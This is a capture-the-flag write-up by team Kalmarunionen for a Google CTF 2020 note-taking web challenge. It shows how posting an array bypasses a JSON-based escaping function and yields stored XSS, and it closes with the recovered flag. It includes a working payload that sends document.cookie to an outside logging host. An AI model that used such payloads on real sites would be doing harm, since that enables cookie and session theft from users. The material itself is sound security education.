

Solution and write-up by team Kalmarunionen.

This is a simple website which allows the user to create notes. Unintendedly, we can get full stored XSS on the website.


Post an array instead of a single value, then we can just inject JS directly. Vulnerable code:

const escape_string = unsafe => JSON.stringify(unsafe).slice(1, -1)
  .replace(/</g, '\\x3C').replace(/>/g, '\\x3E');

POST with content=alert() yields the expected:

        const note = "alert()";
        const note_id = "8028b109-cac1-4351-ad42-16c61cded87d";

POST with content[]=; alert(); // yields XSS:

        const note = ""; alert(); //"";
        const note_id = "8028b109-cac1-4351-ad42-16c61cded87d";

Thus, from here it is a simply matter of e.g. redirecting to steal the cookie. Payload is ; window.location = 'http://xss.wep.dk/log/5f40ca5c92911/writeup/?' + document.cookie; //, yielding the result:

        const note = ""; window.location = 'http://xss.wep.dk/log/5f40ca5c92911/writeup/?' + document.cookie; //"";
        const note_id = "8028b109-cac1-4351-ad42-16c61cded87d";        

And thereby leaking the flag. The result can be observed on our website: http://xss.wep.dk/?id=5f40ca5c92911


Flag: CTF{Express_t0_Tr0ubl3s}

Original writeup (https://github.com/eskildsen/google-ctf-2020/blob/master/web/pasteurize.md).